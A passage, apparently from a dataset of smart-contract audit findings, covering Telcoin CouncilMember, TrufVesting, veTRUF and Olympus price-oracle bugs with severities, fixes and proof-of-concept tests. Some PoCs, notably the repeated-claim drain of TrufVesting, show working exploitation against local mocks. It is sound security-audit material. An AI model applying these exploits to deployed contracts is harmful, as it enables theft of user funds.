stream contract `to` withdraw from, the `streamId` and the address `to` which will receive the available funds from the stream. The vulnerability lies in the parameters passed when calling the `withdrawMax()` function in `_retrieve()`. As we can see, the first encoded parameter in the `encodeWithSelector()` call after the selector is the _target:\\n```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, // <------- This is incorrect\\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n\\nThis means that the proxy target's `withdrawMax()` function will be triggered with the `_target` contract as the `lockup` parameter, which is incorrect. This will make all calls eventually execute `withdrawMax()` on the PRBProxy contract, always reverting.\\nThe parameter needed to perform the `withdrawMax()` call correctly is the actual Sablier lockup contract, which is currently not stored in the `CouncilMember` contract.\\nThe following diagram also summarizes the current wrong interactions for clarity:
In order to fix the vulnerability, the proper address needs to be passed when calling `withdrawMax()`.\\nNote that the actual stream address is currently NOT stored in `CouncilMember.sol`, so it will need to be stored (my example shows a new `actualStream` variable)\\n```\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n// Remove the line below\\n _target, \\n// Add the line below\\n actualStream\\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n
High. ALL withdrawals from the Sablier stream will revert, effectively causing a DoS in the _retrieve() function. Because the _retrieve() function is called in all the main protocol functions, this vulnerability essentially prevents the protocol from ever functioning correctly.\\nProof of Concept\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport {Test, console2} from "forge-std/Test.sol";\\nimport {SablierV2Comptroller} from "@sablier/v2-core/src/SablierV2Comptroller.sol";\\nimport {SablierV2NFTDescriptor} from "@sablier/v2-core/src/SablierV2NFTDescriptor.sol";\\nimport {SablierV2LockupLinear} from "@sablier/v2-core/src/SablierV2LockupLinear.sol";\\nimport {ISablierV2Comptroller} from "@sablier/v2-core/src/interfaces/ISablierV2Comptroller.sol";\\nimport {ISablierV2NFTDescriptor} from "@sablier/v2-core/src/interfaces/ISablierV2NFTDescriptor.sol";\\nimport {ISablierV2LockupLinear} from "@sablier/v2-core/src/interfaces/ISablierV2LockupLinear.sol";\\n\\nimport {CouncilMember, IPRBProxy} from "../src/core/CouncilMember.sol";\\nimport {TestTelcoin} from "./mock/TestTelcoin.sol";\\nimport {MockProxyTarget} from "./mock/MockProxyTarget.sol";\\nimport {PRBProxy} from "./mock/MockPRBProxy.sol";\\nimport {PRBProxyRegistry} from "./mock/MockPRBProxyRegistry.sol";\\n\\nimport {UD60x18} from "@prb/math/src/UD60x18.sol";\\nimport {LockupLinear, Broker, IERC20} from "@sablier/v2-core/src/types/DataTypes.sol";\\nimport {IERC20 as IERC20OZ} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\n\\ncontract PocTest is Test {\\n\\n ////////////////////////////////////////////////////////////////\\n // CONSTANTS //\\n ////////////////////////////////////////////////////////////////\\n\\n bytes32 public constant GOVERNANCE_COUNCIL_ROLE =\\n keccak256("GOVERNANCE_COUNCIL_ROLE");\\n bytes32 public constant SUPPORT_ROLE = keccak256("SUPPORT_ROLE");\\n\\n ////////////////////////////////////////////////////////////////\\n // STORAGE //\\n ////////////////////////////////////////////////////////////////\\n\\n /// @notice Poc Users\\n address public sablierAdmin;\\n address public user;\\n\\n /// @notice Sablier contracts\\n SablierV2Comptroller public comptroller;\\n SablierV2NFTDescriptor public nftDescriptor;\\n SablierV2LockupLinear public lockupLinear;\\n\\n /// @notice Telcoin contracts\\n PRBProxyRegistry public proxyRegistry;\\n PRBProxy public stream;\\n MockProxyTarget public target;\\n CouncilMember public councilMember;\\n TestTelcoin public telcoin;\\n\\n function setUp() public {\\n // Setup users\\n _setupUsers();\\n\\n // Deploy token\\n telcoin = new TestTelcoin(address(this));\\n\\n // Deploy Sablier \\n _deploySablier();\\n\\n // Deploy council member\\n councilMember = new CouncilMember();\\n\\n // Setup stream\\n _setupStream();\\n\\n // Setup the council member\\n _setupCouncilMember();\\n }\\n\\n function testPoc() public {\\n // Step 1: Mint council NFT to user\\n councilMember.mint(user);\\n assertEq(councilMember.balanceOf(user), 1);\\n\\n // Step 2: Forward time 1 days\\n vm.warp(block.timestamp + 1 days);\\n \\n // Step 3: All functions calling _retrieve() (mint(), burn(), removeFromOffice()) will fail\\n vm.expectRevert(abi.encodeWithSignature("PRBProxy_ExecutionReverted()")); \\n councilMember.mint(user);\\n }\\n\\n function _setupUsers() internal {\\n sablierAdmin = makeAddr("sablierAdmin");\\n user = makeAddr("user");\\n }\\n\\n function _deploySablier() internal {\\n // Deploy protocol\\n comptroller = new SablierV2Comptroller(sablierAdmin);\\n nftDescriptor = new SablierV2NFTDescriptor();\\n lockupLinear = new SablierV2LockupLinear(\\n sablierAdmin,\\n ISablierV2Comptroller(address(comptroller)),\\n ISablierV2NFTDescriptor(address(nftDescriptor))\\n );\\n }\\n\\n function _setupStream() internal {\\n\\n // Deploy proxies\\n proxyRegistry = new PRBProxyRegistry();\\n stream = PRBProxy(payable(address(proxyRegistry.deploy())));\\n target = new MockProxyTarget();\\n\\n // Setup stream\\n LockupLinear.Durations memory durations = LockupLinear.Durations({\\n cliff: 0,\\n total: 1 weeks\\n });\\n\\n UD60x18 fee = UD60x18.wrap(0);\\n\\n Broker memory broker = Broker({account: address(0), fee: fee});\\n LockupLinear.CreateWithDurations memory params = LockupLinear\\n .CreateWithDurations({\\n sender: address(this),\\n recipient: address(stream),\\n totalAmount: 100e18,\\n asset: IERC20(address(telcoin)),\\n cancelable: false,\\n transferable: false,\\n durations: durations,\\n broker: broker\\n });\\n\\n bytes memory data = abi.encodeWithSelector(target.createWithDurations.selector, address(lockupLinear), params, "");\\n\\n // Create the stream through the PRBProxy\\n telcoin.approve(address(stream), type(uint256).max);\\n bytes memory response = stream.execute(address(target), data);\\n assertEq(lockupLinear.ownerOf(1), address(stream));\\n }\\n\\n function _setupCouncilMember() internal {\\n // Initialize\\n councilMember.initialize(\\n IERC20OZ(address(telcoin)),\\n "Test Council",\\n "TC",\\n IPRBProxy(address(stream)), // stream_\\n address(target), // target_\\n 1, // id_\\n address(lockupLinear)\\n );\\n\\n // Grant roles\\n councilMember.grantRole(GOVERNANCE_COUNCIL_ROLE, address(this));\\n councilMember.grantRole(SUPPORT_ROLE, address(this));\\n }\\n \\n}\\n```\\n
```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, \\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n
CouncilMember:burn renders the contract inoperable after the first execution
high
The CouncilMember contract suffers from a critical vulnerability that misaligns the balances array after a successful burn, rendering the contract inoperable.\\nThe root cause of the vulnerability is that the `burn` function incorrectly manages the `balances` array, shortening it by one each time an ERC721 token is burned while the latest minted NFT still withholds its unique `tokenId` which maps to the previous value of `balances.length`.\\n```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function burn(\\n // rest of code\\n balances.pop(); // <= FOUND: balances.length decreases, while latest minted nft withold its unique tokenId\\n _burn(tokenId);\\n }\\n```\\n\\nThis misalignment between existing `tokenIds` and the `balances` array results in several critical impacts:\\nHolders with `tokenId` greater than the length of balances cannot claim.\\nSubsequent burns of `tokenId` greater than balances length will revert.\\nSubsequent mint operations will revert due to `tokenId` collision. As `totalSupply` now collides with the existing `tokenId`.\\n```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function mint(\\n // rest of code\\n balances.push(0);\\n _mint(newMember, totalSupply());// <= FOUND\\n }\\n```\\n\\nThis mismanagement creates a cascading effect, collectively rendering the contract inoperable. Following POC will demonstrate the issue more clearly in codes.\\nPOC\\nRun `git apply` on the following patch then run `npx hardhat test` to run the POC.\\n```\\ndiff --git a/telcoin-audit/test/sablier/CouncilMember.test.ts b/telcoin-audit/test/sablier/CouncilMember.test.ts\\nindex 675b89d..ab96b08 100644\\n--- a/telcoin-audit/test/sablier/CouncilMember.test.ts\\n+++ b/telcoin-audit/test/sablier/CouncilMember.test.ts\\n@@ -1,13 +1,14 @@\\n import { expect } from "chai";\\n import { ethers } from "hardhat";\\n import { SignerWithAddress } from "@nomicfoundation/hardhat-ethers/signers";\\n-import { CouncilMember, TestTelcoin, TestStream } from "../../typechain-types";\\n+import { CouncilMember, TestTelcoin, TestStream, ERC721Upgradeable__factory } from "../../typechain-types";\\n \\n describe("CouncilMember", () => {\\n let admin: SignerWithAddress;\\n let support: SignerWithAddress;\\n let member: SignerWithAddress;\\n let holder: SignerWithAddress;\\n+ let lastCouncilMember: SignerWithAddress;\\n let councilMember: CouncilMember;\\n let telcoin: TestTelcoin;\\n let stream: TestStream;\\n@@ -18,7 +19,7 @@ describe("CouncilMember", () => {\\n let supportRole: string = ethers.keccak256(ethers.toUtf8Bytes("SUPPORT_ROLE"));\\n \\n beforeEach(async () => {\\n- [admin, support, member, holder, target] = await ethers.getSigners();\\n+ [admin, support, member, holder, target, lastCouncilMember] = await ethers.getSigners();\\n \\n const TestTelcoinFactory = await ethers.getContractFactory("TestTelcoin", admin);\\n telcoin = await TestTelcoinFactory.deploy(admin.address);\\n@@ -182,6 +183,22 @@ describe("CouncilMember", () => {\\n it("the correct removal is made", async () => {\\n await expect(councilMember.burn(1, support.address)).emit(councilMember, "Transfer");\\n });\\n+ it.only("inoperable contract after burn", async () => {\\n+ await expect(councilMember.mint(lastCouncilMember.address)).to.not.reverted;\\n+\\n+ // This 1st burn will cause contract inoperable due to tokenId & balances misalignment\\n+ await expect(councilMember.burn(1, support.address)).emit(councilMember, "Transfer");\\n+\\n+ // Impact 1. holder with tokenId > balances length cannot claim\\n+ await expect(councilMember.connect(lastCouncilMember).claim(3, 1)).to.revertedWithPanic("0x32"); // @audit-info 0x32: Array accessed at an out-of-bounds or negative index\\n+\\n+ // Impact 2. subsequent burns of tokenId > balances length will revert\\n+ await expect(councilMember.burn(3, lastCouncilMember.address)).to.revertedWithPanic("0x32"); \\n+\\n+ // Impact 3. subsequent mint will revert due to tokenId collision\\n+ await expect(councilMember.mint(lastCouncilMember.address)).to.revertedWithCustomError(councilMember, "ERC721InvalidSender");\\n+\\n+ });\\n });\\n });\\n \\n```\\n\\nResult\\nCouncilMember mutative burn Success ✔ inoperable contract after burn (90ms) 1 passing (888ms)\\nThe Passing execution of the POC confirmed that operations such as `claim`, `burn` & `mint` were all reverted which make the contract inoperable.
It is recommended to avoid popping out balances to keep alignment with uniquely minted tokenId. Alternatively, consider migrating to ERC1155, which inherently manages a built-in balance for each NFT.
The severity of the vulnerability is high due to the high likelihood of occurence and the critical impacts on the contract's operability and token holders' ability to interact with their assets.
```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function burn(\\n // rest of code\\n balances.pop(); // <= FOUND: balances.length decreases, while latest minted nft withold its unique tokenId\\n _burn(tokenId);\\n }\\n```\\n
Users can fully drain the `TrufVesting` contract
high
Due to flaw in the logic in `claimable` any arbitrary user can drain all the funds within the contract.\\nA user's claimable is calculated in the following way:\\nUp until start time it is 0.\\nBetween start time and cliff time it's equal to `initialRelease`.\\nAfter cliff time, it linearly increases until the full period ends.\\nHowever, if we look at the code, when we are at stage 2., it always returns `initialRelease`, even if we've already claimed it. This would allow for any arbitrary user to call claim as many times as they wish and every time they'd receive `initialRelease`. Given enough iterations, any user can drain the contract.\\n```\\n function claimable(uint256 categoryId, uint256 vestingId, address user)\\n public\\n view\\n returns (uint256 claimableAmount)\\n {\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n VestingInfo memory info = vestingInfos[categoryId][vestingId];\\n\\n uint64 startTime = userVesting.startTime + info.initialReleasePeriod;\\n\\n if (startTime > block.timestamp) {\\n return 0;\\n }\\n\\n uint256 totalAmount = userVesting.amount;\\n\\n uint256 initialRelease = (totalAmount * info.initialReleasePct) / DENOMINATOR;\\n\\n startTime += info.cliff;\\n\\n if (startTime > block.timestamp) {\\n return initialRelease;\\n }\\n```\\n\\n```\\n function claim(address user, uint256 categoryId, uint256 vestingId, uint256 claimAmount) public {\\n if (user != msg.sender && (!categories[categoryId].adminClaimable || msg.sender != owner())) {\\n revert Forbidden(msg.sender);\\n }\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (claimAmount == type(uint256).max) {\\n claimAmount = claimableAmount;\\n } else if (claimAmount > claimableAmount) {\\n revert ClaimAmountExceed();\\n }\\n if (claimAmount == 0) {\\n revert ZeroAmount();\\n }\\n\\n categories[categoryId].totalClaimed += claimAmount;\\n userVestings[categoryId][vestingId][user].claimed += claimAmount;\\n trufToken.safeTransfer(user, claimAmount);\\n\\n emit Claimed(categoryId, vestingId, user, claimAmount);\\n }\\n```\\n
change the if check to the following\\n```\\n if (startTime > block.timestamp) {\\n if (initialRelease > userVesting.claimed) {\\n return initialRelease - userVesting.claimed;\\n }\\n else { return 0; } \\n }\\n```\\n\\nPoC\\n```\\n function test_cliffVestingDrain() public { \\n _setupVestingPlan();\\n uint256 categoryId = 2;\\n uint256 vestingId = 0;\\n uint256 stakeAmount = 10e18;\\n uint256 duration = 30 days;\\n\\n vm.startPrank(owner);\\n \\n vesting.setUserVesting(categoryId, vestingId, alice, 0, stakeAmount);\\n\\n vm.warp(block.timestamp + 11 days); // warping 11 days, because initial release period is 10 days\\n // and cliff is at 20 days. We need to be in the middle \\n vm.startPrank(alice);\\n assertEq(trufToken.balanceOf(alice), 0);\\n vesting.claim(alice, categoryId, vestingId, type(uint256).max);\\n \\n uint256 balance = trufToken.balanceOf(alice);\\n assertEq(balance, stakeAmount * 5 / 100); // Alice should be able to have claimed just 5% of the vesting \\n\\n for (uint i; i < 39; i++ ){ \\n vesting.claim(alice, categoryId, vestingId, type(uint256).max);\\n }\\n uint256 newBalance = trufToken.balanceOf(alice); // Alice has claimed 2x the amount she was supposed to be vested. \\n assertEq(newBalance, stakeAmount * 2); // In fact she can keep on doing this to drain the whole contract\\n }\\n```\\n
Any user can drain the contract
```\\n function claimable(uint256 categoryId, uint256 vestingId, address user)\\n public\\n view\\n returns (uint256 claimableAmount)\\n {\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n VestingInfo memory info = vestingInfos[categoryId][vestingId];\\n\\n uint64 startTime = userVesting.startTime + info.initialReleasePeriod;\\n\\n if (startTime > block.timestamp) {\\n return 0;\\n }\\n\\n uint256 totalAmount = userVesting.amount;\\n\\n uint256 initialRelease = (totalAmount * info.initialReleasePct) / DENOMINATOR;\\n\\n startTime += info.cliff;\\n\\n if (startTime > block.timestamp) {\\n return initialRelease;\\n }\\n```\\n
`cancelVesting` will potentially not give users unclaimed, vested funds, even if giveUnclaimed = true
high
The purpose of `cancelVesting` is to cancel a vesting grant and potentially give users unclaimed but vested funds in the event that `giveUnclaimed = true`. However, due to a bug, in the event that the user had staked / locked funds, they will potentially not received the unclaimed / vested funds even if `giveUnclaimed = true`.\\nHere's the cancelVesting function in TrufVesting:\\n```\\nfunction cancelVesting(uint256 categoryId, uint256 vestingId, address user, bool giveUnclaimed)\\n external\\n onlyOwner\\n{\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n if (userVesting.amount == 0) {\\n revert UserVestingDoesNotExists(categoryId, vestingId, user);\\n }\\n\\n if (userVesting.startTime + vestingInfos[categoryId][vestingId].period <= block.timestamp) {\\n revert AlreadyVested(categoryId, vestingId, user);\\n }\\n\\n uint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\n if (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n }\\n\\n VestingCategory storage category = categories[categoryId];\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (giveUnclaimed && claimableAmount != 0) {\\n trufToken.safeTransfer(user, claimableAmount);\\n\\n userVesting.claimed += claimableAmount;\\n category.totalClaimed += claimableAmount;\\n emit Claimed(categoryId, vestingId, user, claimableAmount);\\n }\\n\\n uint256 unvested = userVesting.amount - userVesting.claimed;\\n\\n delete userVestings[categoryId][vestingId][user];\\n\\n category.allocated -= unvested;\\n\\n emit CancelVesting(categoryId, vestingId, user, giveUnclaimed);\\n}\\n```\\n\\nFirst, consider the following code:\\n```\\nuint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\nif (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n}\\n```\\n\\nFirst the locked / staked funds will essentially be un-staked. The following line of code: `userVesting.locked = 0;` exists because there is a call to `uint256 claimableAmount = claimable(categoryId, vestingId, user);` afterwards, and in the event that there were locked funds that were unstaked, these funds should now potentially be `claimable` if they are vested (but if locked is not set to 0, then the vested funds will potentially not be deemed `claimable` by the `claimable` function).\\nHowever, because `userVesting` is `memory` rather than `storage`, this doesn't end up happening (so `userVesting.locked = 0;` is actually a bug). This means that if a user is currently staking all their funds (so all their funds are locked), and `cancelVesting` is called, then they will not receive any funds back even if `giveUnclaimed = true`. This is because the `claimable` function (which will access the unaltered userVestings[categoryId][vestingId][user]) will still think that all the funds are currently locked, even though they are not as they have been forcibly unstaked.
Change `userVesting.locked = 0;` to `userVestings[categoryId][vestingId][user].locked = 0;`
When `cancelVesting` is called, a user may not receive their unclaimed, vested funds.
```\\nfunction cancelVesting(uint256 categoryId, uint256 vestingId, address user, bool giveUnclaimed)\\n external\\n onlyOwner\\n{\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n if (userVesting.amount == 0) {\\n revert UserVestingDoesNotExists(categoryId, vestingId, user);\\n }\\n\\n if (userVesting.startTime + vestingInfos[categoryId][vestingId].period <= block.timestamp) {\\n revert AlreadyVested(categoryId, vestingId, user);\\n }\\n\\n uint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\n if (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n }\\n\\n VestingCategory storage category = categories[categoryId];\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (giveUnclaimed && claimableAmount != 0) {\\n trufToken.safeTransfer(user, claimableAmount);\\n\\n userVesting.claimed += claimableAmount;\\n category.totalClaimed += claimableAmount;\\n emit Claimed(categoryId, vestingId, user, claimableAmount);\\n }\\n\\n uint256 unvested = userVesting.amount - userVesting.claimed;\\n\\n delete userVestings[categoryId][vestingId][user];\\n\\n category.allocated -= unvested;\\n\\n emit CancelVesting(categoryId, vestingId, user, giveUnclaimed);\\n}\\n```\\n
When migrating the owner users will lose their rewards
medium
When a user migrates the owner due to a lost private key, the rewards belonging to the previous owner remain recorded in their account and cannot be claimed, resulting in the loss of user rewards.\\nAccording to the documentation, `migrateUser()` is used when a user loses their private key to migrate the old vesting owner to a new owner.\\n```\\n /**\\n * @notice Migrate owner of vesting. Used when user lost his private key\\n * @dev Only admin can migrate users vesting\\n * @param categoryId Category id\\n * @param vestingId Vesting id\\n * @param prevUser previous user address\\n * @param newUser new user address\\n */\\n```\\n\\nIn this function, the protocol calls `migrateVestingLock()` to obtain a new ID.\\n```\\n if (lockupId != 0) {\\n newLockupId = veTRUF.migrateVestingLock(prevUser, newUser, lockupId - 1) + 1;\\n lockupIds[categoryId][vestingId][newUser] = newLockupId;\\n delete lockupIds[categoryId][vestingId][prevUser];\\n\\n newVesting.locked = prevVesting.locked;\\n }\\n```\\n\\nHowever, in the `migrateVestingLock()` function, the protocol calls `stakingRewards.withdraw()` to withdraw the user's stake, burning points. In the `withdraw()` function, the protocol first calls `updateReward()` to update the user's rewards and records them in the user's account.\\n```\\n function withdraw(address user, uint256 amount) public updateReward(user) onlyOperator {\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n _totalSupply -= amount;\\n _balances[user] -= amount;\\n emit Withdrawn(user, amount);\\n }\\n```\\n\\nHowever, `stakingRewards.withdraw()` is called with the old owner as a parameter, meaning that the rewards will be updated on the old account.\\n```\\n uint256 points = oldLockup.points;\\n stakingRewards.withdraw(oldUser, points);\\n _burn(oldUser, points);\\n```\\n\\nAs mentioned earlier, the old owner has lost their private key and cannot claim the rewards, resulting in the loss of these rewards.
When migrating the owner, the rewards belonging to the previous owner should be transferred to the new owner.
The user's rewards are lost
```\\n /**\\n * @notice Migrate owner of vesting. Used when user lost his private key\\n * @dev Only admin can migrate users vesting\\n * @param categoryId Category id\\n * @param vestingId Vesting id\\n * @param prevUser previous user address\\n * @param newUser new user address\\n */\\n```\\n
Ended locks can be extended
medium
When a lock period ends, it can be extended. If the new extension 'end' is earlier than the current block.timestamp, the user will have a lock that can be unstaked at any time."\\nWhen the lock period ends, the owner of the expired lock can extend it to set a new lock end that is earlier than the current block.timestamp. By doing so, the lock owner can create a lock that is unstakeable at any time.\\nThis is doable because there are no checks in the extendLock function that checks whether the lock is already ended or not.\\nPoC:\\n```\\nfunction test_ExtendLock_AlreadyEnded() external {\\n uint256 amount = 100e18;\\n uint256 duration = 5 days;\\n\\n _stake(amount, duration, alice, alice);\\n\\n // 5 days later, lock is ended for Alice\\n skip(5 days + 1);\\n\\n (,, uint128 _ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock is indeed ended\\n assertTrue(_ends < block.timestamp, "lock is ended");\\n\\n // 36 days passed \\n skip(36 days);\\n\\n // Alice extends her already finished lock 30 more days\\n vm.prank(alice);\\n veTRUF.extendLock(0, 30 days);\\n\\n (,,_ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock can be easily unlocked right away\\n assertTrue(_ends < block.timestamp, "lock is ended");\\n\\n // Alice unstakes her lock, basically alice can unstake her lock anytime she likes\\n vm.prank(alice);\\n veTRUF.unstake(0);\\n }\\n```\\n
Do not let extension of locks that are already ended.
The owner of the lock will achieve points that he can unlock anytime. This is clearly a gaming of the system and shouldn't be acceptable behaviour. A locker having a "lock" that can be unstaked anytime will be unfair for the other lockers. Considering this, I'll label this as high.
```\\nfunction test_ExtendLock_AlreadyEnded() external {\\n uint256 amount = 100e18;\\n uint256 duration = 5 days;\\n\\n _stake(amount, duration, alice, alice);\\n\\n // 5 days later, lock is ended for Alice\\n skip(5 days + 1);\\n\\n (,, uint128 _ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock is indeed ended\\n assertTrue(_ends < block.timestamp, "lock is ended");\\n\\n // 36 days passed \\n skip(36 days);\\n\\n // Alice extends her already finished lock 30 more days\\n vm.prank(alice);\\n veTRUF.extendLock(0, 30 days);\\n\\n (,,_ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock can be easily unlocked right away\\n assertTrue(_ends < block.timestamp, "lock is ended");\\n\\n // Alice unstakes her lock, basically alice can unstake her lock anytime she likes\\n vm.prank(alice);\\n veTRUF.unstake(0);\\n }\\n```\\n
OlympusPrice.v2.sol#storePrice: The moving average prices are used recursively for the calculation of the moving average price.
high
The moving average prices should be calculated by only oracle feed prices. But now, they are calculated by not only oracle feed prices but also moving average price recursively.\\nThat is, the `storePrice` function uses the current price obtained from the `_getCurrentPrice` function to update the moving average price. However, in the case of `asset.useMovingAverage = true`, the `_getCurrentPrice` function computes the current price using the moving average price.\\nThus, the moving average prices are used recursively to calculate moving average price, so the current prices will be obtained incorrectly.\\n`OlympusPrice.v2.sol#storePrice` function is the following.\\n```\\n function storePrice(address asset_) public override permissioned {\\n Asset storage asset = _assetData[asset_];\\n\\n // Check if asset is approved\\n if (!asset.approved) revert PRICE_AssetNotApproved(asset_);\\n\\n // Get the current price for the asset\\n (uint256 price, uint48 currentTime) = _getCurrentPrice(asset_);\\n\\n // Store the data in the obs index\\n uint256 oldestPrice = asset.obs[asset.nextObsIndex];\\n asset.obs[asset.nextObsIndex] = price;\\n\\n // Update the last observation time and increment the next index\\n asset.lastObservationTime = currentTime;\\n asset.nextObsIndex = (asset.nextObsIndex + 1) % asset.numObservations;\\n\\n // Update the cumulative observation, if storing the moving average\\n if (asset.storeMovingAverage)\\n asset.cumulativeObs = asset.cumulativeObs + price - oldestPrice;\\n\\n // Emit event\\n emit PriceStored(asset_, price, currentTime);\\n }\\n```\\n\\n`L319` obtain the current price for the asset by calling the `_getCurrentPrice` function and use it to update `asset.cumulativeObs` in `L331`. The `_getCurrentPrice` function is the following.\\n```\\n function _getCurrentPrice(address asset_) internal view returns (uint256, uint48) {\\n Asset storage asset = _assetData[asset_];\\n\\n // Iterate through feeds to get prices to aggregate with strategy\\n Component[] memory feeds = abi.decode(asset.feeds, (Component[]));\\n uint256 numFeeds = feeds.length;\\n uint256[] memory prices = asset.useMovingAverage\\n ? new uint256[](numFeeds + 1)\\n : new uint256[](numFeeds);\\n uint8 _decimals = decimals; // cache in memory to save gas\\n for (uint256 i; i < numFeeds; ) {\\n (bool success_, bytes memory data_) = address(_getSubmoduleIfInstalled(feeds[i].target))\\n .staticcall(\\n abi.encodeWithSelector(feeds[i].selector, asset_, _decimals, feeds[i].params)\\n );\\n\\n // Store price if successful, otherwise leave as zero\\n // Idea is that if you have several price calls and just\\n // one fails, it'll DOS the contract with this revert.\\n // We handle faulty feeds in the strategy contract.\\n if (success_) prices[i] = abi.decode(data_, (uint256));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // If moving average is used in strategy, add to end of prices array\\n if (asset.useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n\\n // If there is only one price, ensure it is not zero and return\\n // Otherwise, send to strategy to aggregate\\n if (prices.length == 1) {\\n if (prices[0] == 0) revert PRICE_PriceZero(asset_);\\n return (prices[0], uint48(block.timestamp));\\n } else {\\n // Get price from strategy\\n Component memory strategy = abi.decode(asset.strategy, (Component));\\n (bool success, bytes memory data) = address(_getSubmoduleIfInstalled(strategy.target))\\n .staticcall(abi.encodeWithSelector(strategy.selector, prices, strategy.params));\\n\\n // Ensure call was successful\\n if (!success) revert PRICE_StrategyFailed(asset_, data);\\n\\n // Decode asset price\\n uint256 price = abi.decode(data, (uint256));\\n\\n // Ensure value is not zero\\n if (price == 0) revert PRICE_PriceZero(asset_);\\n\\n return (price, uint48(block.timestamp));\\n }\\n }\\n```\\n\\nAs can be seen, when `asset.useMovingAverage = true`, the `_getCurrentPrice` calculates the current `price` `price` using the moving average `price` obtained by `asset.cumulativeObs / asset.numObservations` in `L160`.\\nSo the `price` value in `L331` is obtained from not only oracle feed prices but also moving average `price`. Then, `storePrice` calculates the cumulative observations asset.cumulativeObs = asset.cumulativeObs + `price` - oldestPrice using the `price` which is obtained incorrectly above.\\nThus, the moving average prices are used recursively for the calculation of the moving average price.
When updating the current price and cumulative observations in the `storePrice` function, it should use the oracle price feeds and not include the moving average prices. So, instead of using the `asset.useMovingAverage` state variable in the `_getCurrentPrice` function, we can add a `useMovingAverage` parameter as the following.\\n```\\n function _getCurrentPrice(address asset_, bool useMovingAverage) internal view returns (uint256, uint48) {\\n Asset storage asset = _assetData[asset_];\\n\\n // Iterate through feeds to get prices to aggregate with strategy\\n Component[] memory feeds = abi.decode(asset.feeds, (Component[]));\\n uint256 numFeeds = feeds.length;\\n uint256[] memory prices = useMovingAverage\\n ? new uint256[](numFeeds + 1)\\n : new uint256[](numFeeds);\\n uint8 _decimals = decimals; // cache in memory to save gas\\n for (uint256 i; i < numFeeds; ) {\\n (bool success_, bytes memory data_) = address(_getSubmoduleIfInstalled(feeds[i].target))\\n .staticcall(\\n abi.encodeWithSelector(feeds[i].selector, asset_, _decimals, feeds[i].params)\\n );\\n\\n // Store price if successful, otherwise leave as zero\\n // Idea is that if you have several price calls and just\\n // one fails, it'll DOS the contract with this revert.\\n // We handle faulty feeds in the strategy contract.\\n if (success_) prices[i] = abi.decode(data_, (uint256));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // If moving average is used in strategy, add to end of prices array\\n if (useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n\\n // If there is only one price, ensure it is not zero and return\\n // Otherwise, send to strategy to aggregate\\n if (prices.length == 1) {\\n if (prices[0] == 0) revert PRICE_PriceZero(asset_);\\n return (prices[0], uint48(block.timestamp));\\n } else {\\n // Get price from strategy\\n Component memory strategy = abi.decode(asset.strategy, (Component));\\n (bool success, bytes memory data) = address(_getSubmoduleIfInstalled(strategy.target))\\n .staticcall(abi.encodeWithSelector(strategy.selector, prices, strategy.params));\\n\\n // Ensure call was successful\\n if (!success) revert PRICE_StrategyFailed(asset_, data);\\n\\n // Decode asset price\\n uint256 price = abi.decode(data, (uint256));\\n\\n // Ensure value is not zero\\n if (price == 0) revert PRICE_PriceZero(asset_);\\n\\n return (price, uint48(block.timestamp));\\n }\\n }\\n```\\n\\nThen we should set `useMovingAverage = false` to call `_getCurrentPrice` function only in the `storePrice` function. In other cases, we should set `useMovingAverage = asset.useMovingAverage` to call `_getCurrentPrice` function.
Now the moving average prices are used recursively for the calculation of the moving average price. Then, the moving average prices become more smoothed than the intention of the administrator. That is, even when the actual price fluctuations are large, the price fluctuations of `_getCurrentPrice` function will become too small.\\nMoreover, even though all of the oracle price feeds fails, the moving averge prices will be calculated only by moving average prices.\\nThus the current prices will become incorrect. If `_getCurrentPrice` function value is miscalculated, it will cause fatal damage to the protocol.
